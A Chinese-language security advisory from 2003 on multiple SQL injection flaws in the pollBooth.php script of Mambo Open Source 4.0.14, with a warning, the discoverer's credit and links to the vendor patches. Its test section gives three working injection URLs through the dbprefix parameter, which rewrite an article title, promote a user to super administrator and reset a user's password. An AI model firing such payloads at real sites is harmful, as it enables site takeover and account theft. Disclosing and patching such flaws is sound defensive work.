Mambo Open Source pollBooth.php多个SQL注入漏洞
发布日期:2003-12-10
更新日期:2003-12-16
受影响系统:Mambo Mambo Open Source 4.0.14
描述:
BUGTRAQ ID:
9197
Mambo Open Source是一款开放源代码的WEB内容管理系统。
Mambo Open Source包含的'pollBooth.php'脚本缺少正确的输入验证,远程攻击者可以利用这个漏洞进行SQL注入攻击,可更改数据库信息。
'pollBooth.php'脚本包含的多个URI参数如dbprefix的mos_users,dbprefix的mos_articles等对用户提交的额外输入缺少充分过滤,提交包含恶意SQL命令的数据可更改原来数据库逻辑,导致信息泄露或者数据库被更改。
<*来源:frog-m@n (
frog-man@security-corporation.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=107109991117914&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
frog-m@n (
frog-man@security-corporation.com)提供了如下测试方法:
# The title of the article N?23 becomes "hop" :
http://www.example.com/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
voteID=1&dbprefix=mos_articles%20SET%20title=char(104,111,112)
%20WHERE artid=23/*
# The user having id 52 becomes "super administrator" :
http://www.example.com/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
voteID=1&dbprefix=mos_users%20SET%20usertype=char(115,117,
112,101,114,97,100,109,105,110,105,115,116,114,97,116,111,114)
%20WHERE%20id=52/*
# The password of the user having id 10 becomes 'a' :
http://www.example.com/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
voteID=1&dbprefix=mos_users%20SET%20password=md5(char(97))
%20WHERE%20id=10/*
建议:
厂商补丁:
Mambo
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
其中Patch 1必须先于Patch 2安装:
Mambo Mambo Open Source 4.0.14:
Mambo Upgrade MamboV4.0.14-patch-02.tar.gz
http://heanet.dl.sourceforge.net/sourceforge/mambo/MamboV4.0.14-patch-02.tar.gz
Mambo Upgrade MamboV4.0.14-patch-01.tar.gz
http://heanet.dl.sourceforge.net/sourceforge/mambo/MamboV4.0.14-patch-01.tar.gz浏览次数:3632
严重程度:0(网友投票)